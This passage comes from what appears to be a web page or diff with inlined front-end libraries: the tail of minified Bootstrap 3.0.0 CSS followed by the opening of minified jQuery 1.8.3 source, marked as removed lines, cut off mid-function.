(max-width:1199px){.hidden-md{display:none!important}tr.hidden-md{display:none!important}th.hidden-md,td.hidden-md{display:none!important}}@media(min-width:1200px){.hidden-md.hidden-lg{display:none!important}tr.hidden-md.hidden-lg{display:none!important}th.hidden-md.hidden-lg,td.hidden-md.hidden-lg{display:none!important}}.hidden-lg{display:block!important}tr.hidden-lg{display:table-row!important}th.hidden-lg,td.hidden-lg{display:table-cell!important}@media(max-width:767px){.hidden-lg.hidden-xs{display:none!important}tr.hidden-lg.hidden-xs{display:none!important}th.hidden-lg.hidden-xs,td.hidden-lg.hidden-xs{display:none!important}}@media(min-width:768px) and (max-width:991px){.hidden-lg.hidden-sm{display:none!important}tr.hidden-lg.hidden-sm{display:none!important}th.hidden-lg.hidden-sm,td.hidden-lg.hidden-sm{display:none!important}}@media(min-width:992px) and (max-width:1199px){.hidden-lg.hidden-md{display:none!important}tr.hidden-lg.hidden-md{display:none!important}th.hidden-lg.hidden-md,td.hidden-lg.hidden-md{display:none!important}}@media(min-width:1200px){.hidden-lg{display:none!important}tr.hidden-lg{display:none!important}th.hidden-lg,td.hidden-lg{display:none!important}}.visible-print{display:none!important}tr.visible-print{display:none!important}th.visible-print,td.visible-print{display:none!important}@media print{.visible-print{display:block!important}tr.visible-print{display:table-row!important}th.visible-print,td.visible-print{display:table-cell!important}.hidden-print{display:none!important}tr.hidden-print{display:none!important}th.hidden-print,td.hidden-print{display:none!important}}</style><!-- END extlib/css/bootstrap-3.0.0.min.css -->
-<!-- START extlib/js/jquery-1.8.3.min.js -->
-<script type="text/javascript">/*! jQuery v1.8.3 jquery.com | jquery.org/license */
-(function(e,t){function _(e){var t=M[e]={};return v.each(e.split(y),function(e,n){t[n]=!0}),t}function H(e,n,r){if(r===t&&e.nodeType===1){var i="data-"+n.replace(P,"-$1").toLowerCase();r=e.getAttribute(i);if(typeof r=="string"){try{r=r==="true"?!0:r==="false"?!1:r==="null"?null:+r+""===r?+r:D.test(r)?v.parseJSON(r):r}catch(s){}v.data(e,n,r)}else r=t}return r}function B(e){var t;for(t in e){if(t==="data"&&v.isEmptyObject(e[t]))continue;if(t!=="toJSON")return!1}return!0}function et(){return!1}function tt(){return!0}function ut(e){return!e||!e.parentNode||e.parentNode.nodeType===11}function at(e,t){do e=e[t];while(e&&e.nodeType!==1);return e}function ft(e,t,n){t=t||0;if(v.isFunction(t))return v.grep(e,function(e,r){var i=!!t.call(e,r,e);return i===n});if(t.nodeType)return v.grep(e,function(e,r){return e===t===n});if(typeof t=="string"){var r=v.grep(e,function(e){return e.nodeType===1});if(it.test(t))return v.filter(t,r,!n);t=v.filter(t,r)}return v.grep(e,function(e,r){return v.inArray(e,t)>=0===n})}function lt(e){var t=ct.split("|"),n=e.createDocumentFragment();if(n.createElement)while(t.length)n.createElement(t.pop());return n}function Lt(e,t){return e.getElementsByTagName(t)[0]||e.appendChild(e.ownerDocument.createElement(t))}function At(e,t){if(t.nodeType!==1||!v.hasData(e))return;var n,r,i,s=v._data(e),o=v._data(t,s),u=s.events;if(u){delete o.handle,o.events={};for(n in u)for(r=0,i=u[n].length;r<i;r++)v.event.add(t,n,u[n][r])}o.data&&(o.data=v.extend({},o.data))}function Ot(e,t){var n;if(t.nodeType!==1)return;t.clearAttributes&&t.clearAttributes(),t.mergeAttributes&&t.mergeAttributes(e),n=t.nodeName.toLowerCase(),n==="object"?(t.parentNode&&(t.outerHTML=e.outerHTML),v.support.html5Clone&&e.innerHTML&&!v.trim(t.innerHTML)&&(t.innerHTML=e.innerHTML)):n==="input"&&Et.test(e.type)?(t.defaultChecked=t.checked=e.checked,t.value!==e.value&&(t.value=e.value)):n==="option"?t.selected=e.defaultSelected:n==="input"||n==="textarea"?t.defaultValue=e.defaultValue:n==="script"&&t.text!==e.text&&(t.text=e.text),t.removeAttribute(v.expando)}function Mt(e){return typeof e.getElementsByTagName!="undefined"?e.getElementsByTagName("*"):typeof e.querySelectorAll!="undefined"?e.querySelectorAll("*"):[]}function _t(e){Et.test(e.type)&&(e.defaultChecked=e.checked)}function Qt(e,t){if(t in e)return t;var n=t.charAt(0).toUpperCase()+t.slice(1),r=t,i=Jt.length;while(i--){t=Jt[i]+n;if(t in e)return t}return r}function Gt(e,t){return e=t||e,v.css(e,"display")==="none"||!v.contains(e.ownerDocument,e)}function Yt(e,t){var n,r,i=[],s=0,o=e.length;for(;s<o;s++){n=e[s];if(!n.style)continue;i[s]=v._data(n,"olddisplay"),t?(!i[s]&&n.style.display==="none"&&(n.style.display=""),n.style.display===""&&Gt(n)&&(i[s]=v._data(n,"olddisplay",nn(n.nodeName)))):(r=Dt(n,"display"),!i[s]&&r!=="none"&&v._data(n,"olddisplay",r))}for(s=0;s<o;s++){n=e[s];if(!n.style)continue;if(!t||n.style.display==="none"||n.style.display==="")n.style.display=t?i[s]||"":"none"}return e}function Zt(e,t,n){var r=Rt.exec(t);return r?Math.max(0,r[1]-(n||0))+(r[2]||"px"):t}function en(e,t,n,r){var i=n===(r?"border":"content")?4:t==="width"?1:0,s=0;for(;i<4;i+=2)n==="margin"&&(s+=v.css(e,n+$t[i],!0)),r?(n==="content"&&(s-=parseFloat(Dt(e,"padding"+$t[i]))||0),n!=="margin"&&(s-=parseFloat(Dt(e,"border"+$t[i]+"Width"))||0)):(s+=parseFloat(Dt(e,"padding"+$t[i]))||0,n!=="padding"&&(s+=parseFloat(Dt(e,"border"+$t[i]+"Width"))||0));return s}function tn(e,t,n){var r=t==="width"?e.offsetWidth:e.offsetHeight,i=!0,s=v.support.boxSizing&&v.css(e,"boxSizing")==="border-box";if(r<=0||r==null){r=Dt(e,t);if(r<0||r==null)r=e.style[t];if(Ut.test(r))return r;i=s&&(v.support.boxSizingReliable||r===e.style[t]),r=parseFloat(r)||0}return r+en(e,t,n||(s?"border":"content"),i)+"px"}function nn(e){if(Wt[e])return Wt[e];var t=v("<"+e+">").appendTo(i.body),n=t.css("display");t.remove();if(n==="none"||n===""){Pt=i.body.appendChild(Pt||v.extend(i.createElement("iframe"),{frameBorder:0,width:0,height:0}));if(!Ht||!Pt.createElement)Ht=(Pt.contentWindow||Pt.contentDocument).document,Ht.write("<!doctype html><html><body>"),Ht.close();t=Ht.body.appendChild(Ht.createElement(e)),n=Dt(t,"display"),i.body.removeChild(Pt)}return Wt[e]=n,n}function fn(e,t,n,r){var i;if(v.isArray(t))v.each(t,function(t,i){n||sn.test(e)?r(e,i):fn(e+"["+(typeof i=="object"?t:"")+"]",i,n,r)});else if(!n&&v.type(t)==="object")for(i in t)fn(e+"["+i+"]",t[i],n,r);else r(e,t)}function Cn(e){return function(t,n){typeof t!="string"&&(n=t,t="*");var r,i,s,o=t.toLowerCase().split(y),u=0,a=o.length;if(v.isFunction(n))for(;u<a;u++)r=o[u],s=/^\+/.test(r),s&&(r=r.substr(1)||"*"),i=e[r]=e[r]||[],i[s?"unshift":"push"](n)}}function kn(e,n,r,i,s,o){s=s||n.dataTypes[0],o=o||{},o[s]=!0;var u,a=e[s],f=0,l=a?a.length:0,c=e===Sn;for(;f<l&&(c||!u);f++)u=a[f](n,r,i),typeof u=="string"&&(!c||o[u]?u=t:(n.dataTypes.unshift(u),u=kn(e,n,r,i,u,o)));return(c||!u)&&!o["*"]&&(u=kn(e,n,r,i,"*",o)),u}function Ln(e,n){var r,i,s=v.ajaxSettings.flatOptions||{};for(r in n)n[r]!==t&&((s[r]?e:i||(i={}))[r]=n[r]);i&&v.extend(!0,e,i)}function An(e,n,r){var i,s,o,u,a=e.contents,f=e.dataTypes,l=e.responseFields;for(s in l)s in r&&(n[l[s]]=r[s]);while(f[0]==="*")f.shift(),i===t&&(i=e.mimeType||n.getResponseHeader("content-type"));if(i)for(s in a)if(a[s]&&a[s].test(i)){f.unshift(s);break}if(f[0]in r)o=f[0];else{for(s in r){if(!f[0]||e.converters[s+" "+f[0]]){o=s;break}u||(u=s)}o=o||u}if(o)return o!==f[0]&&f.unshift(o),r[o]}function On(e,t){var n,r,i,s,o=e.dataTypes.slice(),u=o[0],a={},f=0;e.dataFilter&&(t=e.dataFilter(t,e.dataType));if(o[1])for(n in e.converters)a[n.toLowerCase()]=e.converters[n];for(;i=o[++f];)if(i!=="*"){if(u!=="*"&&u!==i){n=a[u+" "+i]||a["* "+i];if(!n)for(r in a){s=r.split(" ");if(s[1]===i){n=a[u+" "+s[0]]||a["* "+s[0]];if(n){n===!0?n=a[r]:a[r]!==!0&&(i=s[0],o.splice(f--,0,i));break}}}if(n!==!0)if(n&&e["throws"])t=n(t);else try{t=n(t)}catch(l){return{state:"parsererror",error:n?l:"No conversion from "+u+" to "+i}}}u=i}return{state:"success",data:t}}function Fn(){try{return new e.XMLHttpRequest}catch(t){}}function In(){try{return new e.ActiveXObject("Microsoft.XMLHTTP")}catch(t){}}function $n(){return setTimeout(function(){qn=t},0),qn=v.now()}function Jn(e,t){v.each(t,function(t,n){var r=(Vn[t]||[]).concat(Vn["*"]),i=0,s=r.length;for(;i<s;i++)if(r[i].call(e,t,n))return})}function Kn(e,t,n){var r,i=0,s=0,o=Xn.length,u=v.Deferred().always(function(){delete a.elem}),a=function(){var t=qn||$n(),n=Math.max(0,f.startTime+f.duration-t),r=n/f.duration||0,i=1-r,s=0,o=f.tweens.length;for(;s<o;s++)f.tweens[s].run(i);return u.notifyWith(e,[f,i,n]),i<1&&o?n:(u.resolveWith(e,[f]),!1)},f=u.promise({elem:e,props:v.extend({},t),opts:v.extend(!0,{specialEasing:{}},n),originalProperties:t,originalOptions:n,startTime:qn||$n(),duration:n.duration,tweens:[],createTween:function(t,n,r){var i=v.Tween(e,f.opts,t,n,f.opts.specialEasing[t]||f.opts.easing);return f.tweens.push(i),i},stop:function(t){var n=0,r=t?f.tweens.length:0;for(;n<r;n++)f.tweens[n].run(1);return t?u.resolveWith(e,[f,t]):u.rejectWith(e,[f,t]),this}}),l=f.props;Qn(l,f.opts.specialEasing);for(;i<o;i++){r=Xn[i].call(f,e,l,f.opts);if(r)return r}return Jn(f,l),v.isFunction(f.opts.start)&&f.opts.start.call(e,f),v.fx.timer(v.extend(a,{anim:f,queue:f.opts.queue,elem:e})),f.progress(f.opts.progress).done(f.opts.done,f.opts.complete).fail(f.opts.fail).always(f.opts.always)}function Qn(e,t){var n,r,i,s,o;for(n in e){r=v.camelCase(n),i=t[r],s=e[n],v.isArray(s)&&(i=s[1],s=e[n]=s[0]),n!==r&&(e[r]=s,delete e[n]),o=v.cssHooks[r];if(o&&"expand"in o){s=o.expand(s),delete e[r];for(n in s)n in e||(e[n]=s[n],t[n]=i)}else t[r]=i}}function Gn(e,t,n){var r,i,s,o,u,a,f,l,c,h=this,p=e.style,d={},m=[],g=e.nodeType&&Gt(e);n.queue||(l=v._queueHooks(e,"fx"),l.unqueued==null&&(l.unqueued=0,c=l.empty.fire,l.empty.fire=function(){l.unqueued||c()}),l.unqueued++,h.always(function(){h.always(function(){l.unqueued--,v.queue(e,"fx").length||l.empty.fire()})})),e.nodeType===1&&("height"in t||"width"in t)&&(n.overflow=[p.overflow,p.overflowX,p.overflowY],v.css(e,"display")==="inline"&&v.css(e,"float")==="none"&&(!v.support.inlineBlockNeedsLayout||nn(e.nodeName)==="inline"?p.display="inline-block":p.zoom=1)),n.overflow&&(p.overflow="hidden",v.support.shrinkWrapBlocks||h.done(function(){p.overflow=n.overflow[0],p.overflowX=n.overflow[1],p.overflowY=n.overflow[2]}));for(r in t){s=t[r];if(Un.exec(s)){delete t[r],a=a||s==="toggle";if(s===(g?"hide":"show"))continue;m.push(r)}}o=m.length;if(o){u=v._data(e,"fxshow")||v._data(e,"fxshow",{}),"hidden"in u&&(g=u.hidden),a&&(u.hidden=!g),g?v(e).show():h.done(function(){v(e).hide()}),h.done(function(){var t;v.removeData(e,"fxshow",!0);for(t in d)v.style(e,t,d[t])});for(r=0;r<o;r++)i=m[r],f=h.createTween(i,g?u[i]:0),d[i]=u[i]||v.style(e,i),i in u||(u[i]=f.start,g&&(f.end=f.start,f.start=i==="width"||i==="height"?1:0))}}function Yn(e,t,n,r,i){return new Yn.prototype.init(e,t,n,r,i)}function Zn(e,t){var n,r={height:e},i=0;t=t?1:0;for(;i<4;i+=2-t)n=$t[i],r["margin"+n]=r["padding"+n]=e;return t&&(r.opacity=r.width=e),r}function tr(e){return v.isWindow(e)?e:e.nodeType===9?e.defaultView||e.parentWindow:!1}var n,r,i=e.document,s=e.location,o=e.navigator,u=e.jQuery,a=e.$,f=Array.prototype.push,l=Array.prototype.slice,c=Array.prototype.indexOf,h=Object.prototype.toString,p=Object.prototype.hasOwnProperty,d=String.prototype.trim,v=function(e,t){return new v.fn.init(e,t,n)},m=/[\-+]?(?:\d*\.|)\d+(?:[eE][\-+]?\d+|)/.source,g=/\S/,y=/\s+/,b=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,w=/^(?:[^#<]*(<[\w\W]+>)[^>]*$|#([\w\-]*)$)/,E=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,S=/^[\],:{}\s]*$/,x=/(?:^|:|,)(?:\s*\[)+/g,T=/\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g,N=/"[^"\\\r\n]*"|true|false|null|-?(?:\d\d*\.|)\d+(?:[eE][\-+]?\d+|)/g,C=/^-ms-/,k=/-([\da-z])/gi,L=function(e,t){return(t+"").toUpperCase()},A=function(){i.addEventListener?(i.removeEventListener("DOMContentLoaded",A,!1),v.ready()):i.readyState==="complete"&&(i.detachEvent("onreadystatechange",A),v.ready())},O={};v.fn=v.prototype={constructor:v,init:function(e,n,r){var s,o,u,a;if(!e)return this;if(e.nodeType)return this.context=this[0]=e,this.length=1,this;if(typeof e=="string"){e.charAt(0)==="<"&&e.charAt(e.length-1)===">"&&e.length>=3?s=[null,e,null]:s=w.exec(e);if(s&&(s[1]||!n)){if(s[1])return n=n instanceof v?n[0]:n,a=n&&n.nodeType?n.ownerDocument||n:i,e=v.parseHTML(s[1],a,!0),E.test(s[1])&&v.isPlainObject(n)&&this.attr.call(e,n,!0),v.merge(this,e);o=i.getElementById(s[2]);if(o&&o.parentNode){if(o.id!==s[2])return r.find(e);this.length=1,this[0]=o}return this.context=i,this.selector=e,this}return!n||n.jquery?(n||r).find(e):this.constructor(n).find(e)}return v.isFunction(e)?r.ready(e):(e.selector!==t&&(this.selector=e.selector,this.context=e.context),v.makeArray(e,this))},selector:"",jquery:"1.8.3",length:0,size:function(){return this.length},toArray:function(){return l.call(this)},get:function(e){return e==null?this.toArray():e<0?this[this.length+e]:this[e]},pushStack:function(e,t,n){var r=v.merge(this.constructor(),e);return r.prevObject=this,r.context=this.context,t==="find"?r.selector=this.selector+(this.selector?" ":"")+n:t&&(r.selector=this.selector+"."+t+"("+n+")"),r},each:function(e,t){return v.each(this,e,t)},ready:function(e){return v.ready.promise().done(e),this},eq:function(e){return e=+e,e===-1?this.slice(e):this.slice(e,e+1)},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},slice:function(){return this.pushStack(l.apply(this,arguments),"slice",l.call(arguments).join(","))},map:function(e){return this.pushStack(v.map(this,function(t,n){return e.call(t,n,t)}))},end:function(){return this.prevObject||this.constructor(null)},push:f,sort:[].sort,splice:[].splice},v.fn.init.prototype=v.fn,v.extend=v.fn.extend=function(){var e,n,r,i,s,o,u=arguments[0]||{},a=1,f=arguments.length,l=!1;typeof u=="boolean"&&(l=u,u=arguments[1]||{},a=2),typeof u!="object"&&!v.isFunction(u)&&(u={}),f===a&&(u=this,--a);for(;a<f;a++)if((e=arguments[a])!=null)for(n in e){r=u[n],i=e[n];if(u===i)continue;l&&i&&(v.isPlainObject(i)||(s=v.isArray(i)))?(s?(s=!1,o=r&&v.isArray(r)?r:[]):o=r&&v.isPlainObject(r)?r:{},u[n]=v.extend(l,o,i)):i!==t&&(u[n]=i)}return u},v.extend({noConflict:function(t){return e.$===v&&(e.$=a),t&&e.jQuery===v&&(e.jQuery=u),v},isReady:!1,readyWait:1,holdReady:function(e){e?v.readyWait++:v.ready(!0)},ready:function(e){if(e===!0?--v.readyWait:v.isReady)return;if(!i.body)return setTimeout(v.ready,1);v.isReady=!0;if(e!==!0&&--v.readyWait>0)return;r.resolveWith(i,[v]),v.fn.trigger&&v(i).trigger("ready").off("ready")},isFunction:function(e){return v.type(e)==="function"},isArray:Array.isArray||function(e){return v.type(e)==="array"},isWindow:function(e){return e!=null&&e==e.window},isNumeric:function(e){return!isNaN(parseFloat(e))&&isFinite(e)},type:function(e){return e==null?String(e):O[h.call(e)]||"object"},isPlainObject:function(e){if(!e||v.type(e)!=="object"||e.nodeType||v.isWindow(e))return!1;try{if(e.constructor&&!p.call(e,"constructor")&&!p.call(e.constructor.prototype,"isPrototypeOf"))return!1}catch(n){return!1}var r;for(r in e);return r===t||p.call(e,r)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},error:function(e){throw new Error(e)},parseHTML:function(e,t,n){var r;return!e||typeof e!="string"?null:(typeof t=="boolean"&&(n=t,t=0),t=t||i,(r=E.exec(e))?[t.createElement(r[1])]:(r=v.buildFragment([e],t,n?null:[]),v.merge([],(r.cacheable?v.clone(r.fragment):r.fragment).childNodes)))},parseJSON:function(t){if(!t||typeof t!="string")return null;t=v.trim(t);if(e.JSON&&e.JSON.parse)return e.JSON.parse(t);if(S.test(t.replace(T,"@").replace(N,"]").replace(x,"")))return(new Function("return "+t))();v.error("Invalid JSON: "+t)},parseXML:function(n){var r,i;if(!n||typeof n!="string")return null;try{e.DOMParser?(i=new DOMParser,r=i.parseFromString(n,"text/xml")):(r=new ActiveXObject("Microsoft.XMLDOM"),r.async="false",r.loadXML(n))}catch(s){r=t}return(!r||!r.documentElement||r.getElementsByTagName("parsererror").length)&&v.error("Invalid XML: "+n),r},noop:function(){},globalEval:function(t){t&&g.test(t)&&(e.execScript||function(t){e.eval.call(e,t)})(t)},camelCase:function(e){return e.replace(C,"ms-").replace(k,L)},nodeName:function(e,t){return e.nodeName&&e.nodeName.toLowerCase()===t.toLowerCase()},each:function(e,n,r){var i,s=0,o=e.length,u=o===t||v.isFunction(e);if(r){if(u){for(i in e)if(n.apply(e[i],r)===!1)break}else for(;s<o;)if(n.apply(e[s++],r)===!1)break}else if(u){for(i in e)if(n.call(e[i],i,e[i])===!1)break}else for(;s<o;)if(n.call(e[s],s,e[s++])===!1)break;return e},trim:d&&!d.call("\ufeff\u00a0")?function(e){return e==null?"":d.call(e)}:function(e){return e==null?"":(e+"").replace(b,"")},makeArray:function(e,t){var n,r=t||[];return e!=null&&(n=v.type(e),e.length==null||n==="string"||n==="function"||n==="regexp"||v.isWindow(e)?f.call(r,e):v.merge(r,e)),r},inArray:function(e,t,n){var r;if(t){if(c)return c.call(t,e,n);r=t.length,n=n?n<0?Math.max(0,r+n):n:0;for(;n<r;n++)if(n in t&&t[n]===e)return n}return-1},merge:function(e,n){var r=n.length,i=e.length,s=0;if(typeof r=="number")for(;s<r;s++)e[i++]=n[s];else while(n[s]!==t)e[i++]=n[s++];return e.length=i,e},grep:function(e,t,n){var r,i=[],s=0,o=e.length;n=!!n;for(;s<o;s++)r=!!t(e[s],s),n!==r&&i.push(e[s]);return i},map:function(e,n,r){var i,s,o=[],u=0,a=e.length,f=e instanceof v||a!==t&&typeof a=="number"&&(a>0&&e[0]&&e[a-1]||a===0||v.isArray(e));if(f)for(;u<a;u++)i=n(e[u],u,r),i!=null&&(o[o.length]=i);else for(s in e)i=n(e[s],s,r),i!=null&&(o[o.length]=i);return o.concat.apply([],o)},guid:1,proxy:function(e,n){var r,i,s;return typeof n=="string"&&(r=e[n],n=e,e=r),v.isFunction(e)?(i=l.call(arguments,2),s=function(){return e.apply(n,i.concat(l.call(arguments)))},s.guid=e.guid=e.guid||v.guid++,s):t},access:function(e,n,r,i,s,o,u){var a,f=r==null,l=0,c=e.length;if(r&&typeof r=="object"){for(l in r)v.access(e,n,l,r[l],1,o,i);s=1}else if(i!==t){a=u===t&&v.isFunction(i),f&&(a?(a=n,n=function(e,t,n){return a.call(v(e),n)}):(n.call(e,i),n=null));if(n)for(;l<c;l++)n(e[l],r,a?i.call(e[l],l,n(e[l],r)):i,u);s=1}return s?e:f?n.call(e):c?n(e[0],r):o},now:function(){return(new Date).getTime()}}),v.ready.promise=function(t){if(!r){r=v.Deferred();if(i.readyState==="complete")setTimeout(v.ready,1);else if(i.addEventListener)i.addEventListener("DOMContentLoaded",A,!1),e.addEventListener("load",v.ready,!1);else{i.attachEvent("onreadystatechange",A),e.attachEvent("onload",v.ready);var n=!1;try{n=e.frameElement==null&&i.documentElement}catch(s){}n&&n.doScroll&&function o(){if(!v.isReady){try{n.doScroll("left")}catch(e){return setTimeout(o,50)}v.ready()}}()}}return r.promise(t)},v.each("Boolean Number String Function Array Date RegExp Object".split(" "),function(e,t){O["[object "+t+"]"]=t.toLowerCase()}),n=v(i);var M={};v.Callbacks=function(e){e=typeof e=="string"?M[e]||_(e):v.extend({},e);var n,r,i,s,o,u,a=[],f=!e.once&&[],l=function(t){n=e.memory&&t,r=!0,u=s||0,s=0,o=a.length,i=!0;for(;a&&u<o;u++)if(a[u].apply(t[0],t[1])===!1&&e.stopOnFalse){n=!1;break}i=!1,a&&(f?f.length&&l(f.shift()):n?a=[]:c.disable())},c={add:function(){if(a){var t=a.length;(function r(t){v.each(t,function(t,n){var i=v.type(n);i==="function"?(!e.unique||!c.has(n))&&a.push(n):n&&n.length&&i!=="string"&&r(n)})})(arguments),i?o=a.length:n&&(s=t,l(n))}return this},remove:function(){return a&&v.each(arguments,function(e,t){var n;while((n=v.inArray(t,a,n))>-1)a.splice(n,1),i&&(n<=o&&o--,n<=u&&u--)}),this},has:function(e){return v.inArray(e,a)>-1},empty:function(){return a=[],this},disable:function(){return a=f=n=t,this},disabled:function(){return!a},lock:function(){return f=t,n||c.disable(),this},locked:function(){return!f},fireWith:function(e,t){return t=t||[],t=[e,t.slice?t.slice():t],a&&(!r||f)&&(i?f.push(t):l(t)),this},fire:function(){return c.fireWith(this,arguments),this},fired:function(){return!!r}};return c},v.extend({Deferred:function(e){var t=[["resolve","done",v.Callbacks("once memory"),"resolved"],["reject","fail",v.Callbacks("once memory"),"rejected"],["notify","progress",v.Callbacks("memory")]],n="pending",r={state:function(){return n},always:function(){return i.done(arguments).fail(arguments),this},then:function(){var e=arguments;return v.Deferred(function(n){v.each(t,function(t,r){var s=r[0],o=e[t];i[r[1]](v.isFunction(o)?function(){var e=o.apply(this,arguments);e&&v.isFunction(e.promise)?e.promise().done(n.resolve).fail(n.reject).progress(n.notify):n[s+"With"](this===i?n:this,[e])}:n[s])}),e=null}).promise()},promise:function(e){return e!=null?v.extend(e,r):r}},i={};return r.pipe=r.then,v.each(t,function(e,s){var o=s[2],u=s[3];r[s[1]]=o.add,u&&o.add(function(){n=u},t[e^1][2].disable,t[2][2].lock),i[s[0]]=o.fire,i[s[0]+"With"]=o.fireWith}),r.promise(i),e&&e.call(i,i),i},when:function(e){var t=0,n=l.call(arguments),r=n.length,i=r!==1||e&&v.isFunction(e.promise)?r:0,s=i===1?e:v.Deferred(),o=function(e,t,n){return function(r){t[e]=this,n[e]=arguments.length>1?l.call(arguments):r,n===u?s.notifyWith(t,n):--i||s.resolveWith(t,n)}},u,a,f;if(r>1){u=new Array(r),a=new Array(r),f=new Array(r);for(;t<r;t++)n[t]&&v.isFunction(n[t].promise)?n[t].promise().done(o(t,f,n)).fail(s.reject).progress(o(t,a,u)):--i}return i||s.resolveWith(f,n),s.promise()}}),v.support=function(){var t,n,r,s,o,u,a,f,l,c,h,p=i.createElement("div");p.setAttribute("className","t"),p.innerHTML="  <link/><table></table><a href='/a'>a</a><input type='checkbox'/>",n=p.getElementsByTagName("*"),r=p.getElementsByTagName("a")[0];if(!n||!r||!n.length)return{};s=i.createElement("select"),o=s.appendChild(i.createElement("option")),u=p.getElementsByTagName("input")[0],r.style.cssText="top:1px;float:left;opacity:.5",t={leadingWhitespace:p.firstChild.nodeType===3,tbody:!p.getElementsByTagName("tbody").length,htmlSerialize:!!p.getElementsByTagName("link").length,style:/top/.test(r.getAttribute("style")),hrefNormalized:r.getAttribute("href")==="/a",opacity:/^0.5/.test(r.style.opacity),cssFloat:!!r.style.cssFloat,checkOn:u.value==="on",optSelected:o.selected,getSetAttribute:p.className!=="t",enctype:!!i.createElement("form").enctype,html5Clone:i.createElement("nav").cloneNode(!0).outerHTML!=="<:nav></:nav>",boxModel:i.compatMode==="CSS1Compat",submitBubbles:!0,changeBubbles:!0,focusinBubbles:!1,deleteExpando:!0,noCloneEvent:!0,inlineBlockNeedsLayout:!1,shrinkWrapBlocks:!1,reliableMarginRight:!0,boxSizingReliable:!0,pixelPosition:!1},u.checked=!0,t.noCloneChecked=u.cloneNode(!0).checked,s.disabled=!0,t.optDisabled=!o.disabled;try{delete p.test}catch(d){t.deleteExpando=!1}!p.addEventListener&&p.attachEvent&&p.fireEvent&&(p.attachEvent("onclick",h=function(){t.noCloneEvent=!1}),p.cloneNode(!0).fireEvent("onclick"),p.detachEvent("onclick",h)),u=i.createElement("input"),u.value="t",u.setAttribute("type","radio"),t.radioValue=u.value==="t",u.setAttribute("checked","checked"),u.setAttribute("name","t"),p.appendChild(u),a=i.createDocumentFragment(),a.appendChild(p.lastChild),t.checkClone=a.cloneNode(!0).cloneNode(!0).lastChild.checked,t.appendChecked=u.checked,a.removeChild(u),a.appendChild(p);if(p.attachEvent)for(l in{submit:!0,change:!0,focusin:!0})f="on"+l,c=f in p,c||(p.setAttribute(f,"return;"),c=typeof p[f]=="function"),t[l+"Bubbles"]=c;return v(function(){var n,r,s,o,u="padding:0;margin:0;border:0;display:block;overflow:hidden;",a=i.getElementsByTagName("body")[0];if(!a)return;n=i.createElement("div"),n.style.cssText="visibility:hidden;border:0;width:0;height:0;position:static;top:0;margin-top:1px",a.insertBefore(n,a.firstChild),r=i.createElement("div"),n.appendChild(r),r.innerHTML="<table><tr><td></td><td>t</td></tr></table>",s=r.getElementsByTagName("td"),s[0].style.cssText="padding:0;margin:0;border:0;display:none",c=s[0].offsetHeight===0,s[0].style.display="",s[1].style.display="none",t.reliableHiddenOffsets=c&&s[0].offsetHeight===0,r.innerHTML="",r.style.cssText="box-sizing:border-box;-moz-box-sizing:border-box;-webkit-box-sizing:border-box;padding:1px;border:1px;display:block;width:4px;margin-top:1%;position:absolute;top:1%;",t.boxSizing=r.offsetWidth===4,t.doesNotIncludeMarginInBodyOffset=a.offsetTop!==1,e.getComputedStyle&&(t.pixelPosition=(e.getComputedStyle(r,null)||{}).top!=="1%",t.boxSizingReliable=(e.getComputedStyle(r,null)||{width:"4px"}).width==="4px",o=i.createElement("div"),o.style.cssText=r.style.cssText=u,o.style.marginRight=o.style.width="0",r.style.width="1px",r.appendChild(o),t.reliableMarginRight=!parseFloat((e.getComputedStyle(o,null)||{}).marginRight)),typeof r.style.zoom!="undefined"&&(r.innerHTML="",r.style.cssText=u+"width:1px;padding:1px;display:inline;zoom:1",t.inlineBlockNeedsLayout=r.offsetWidth===3,r.style.display="block",r.style.overflow="visible",r.innerHTML="<div></div>",r.firstChild.style.width="5px",t.shrinkWrapBlocks=r.offsetWidth!==3,n.style.zoom=1),a.removeChild(n),n=r=s=o=null}),a.removeChild(p),n=r=s=o=u=a=p=null,t}();var D=/(?:\{[\s\S]*\}|\[[\s\S]*\])$/,P=/([A-Z])/g;v.extend({cache:{},deletedIds:[],uuid:0,expando:"jQuery"+(v.fn.jquery+Math.random()).replace(/\D/g,""),noData:{embed:!0,object:"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000",applet:!0},hasData:function(e){return e=e.nodeType?v.cache[e[v.expando]]:e[v.expando],!!e&&!B(e)},data:function(e,n,r,i){if(!v.acceptData(e))return;var s,o,u=v.expando,a=typeof n=="string",f=e.nodeType,l=f?v.cache:e,c=f?e[u]:e[u]&&u;if((!c||!l[c]||!i&&!l[c].data)&&a&&r===t)return;c||(f?e[u]=c=v.deletedIds.pop()||v.guid++:c=u),l[c]||(l[c]={},f||(l[c].toJSON=v.noop));if(typeof n=="object"||typeof n=="function")i?l[c]=v.extend(l[c],n):l[c].data=v.extend(l[c].data,n);return s=l[c],i||(s.data||(s.data={}),s=s.data),r!==t&&(s[v.camelCase(n)]=r),a?(o=s[n],o==null&&(o=s[v.camelCase(n)])):o=s,o},removeData:function(e,t,n){if(!v.acceptData(e))return;var r,i,s,o=e.nodeType,u=o?v.cache:e,a=o?e[v.expando]:v.expando;if(!u[a])return;if(t){r=n?u[a]:u[a].data;if(r){v.isArray(t)||(t in r?t=[t]:(t=v.camelCase(t),t in r?t=[t]:t=t.split(" ")));for(i=0,s=t.length;i<s;i++)delete r[t[i]];if(!(n?B:v.isEmptyObject)(r))return}}if(!n){delete u[a].data;if(!B(u[a]))return}o?v.cleanData([e],!0):v.support.deleteExpando||u!=u.window?delete u[a]:u[a]=null},_data:function(e,t,n){return v.data(e,t,n,!0)},acceptData:function(e){var t=e.nodeName&&v.noData[e.nodeName.toLowerCase()];return!t||t!==!0&&e.getAttribute("classid")===t}}),v.fn.extend({data:function(e,n){var r,i,s,o,u,a=this[0],f=0,l=null;if(e===t){if(this.length){l=v.data(a);if(a.nodeType===1&&!v._data(a,"parsedAttrs")){s=a.attributes;for(u=s.length;f<u;f++)o=s[f].name,o.indexOf("data-")||(o=v.camelCase(o.substring(5)),H(a,o,l[o]));v._data(a,"parsedAttrs",!0)}}return l}return typeof e=="object"?this.each(function(){v.data(this,e)}):(r=e.split(".",2),r[1]=r[1]?"."+r[1]:"",i=r[1]+"!",v.access(this,function(n){if(n===t)return 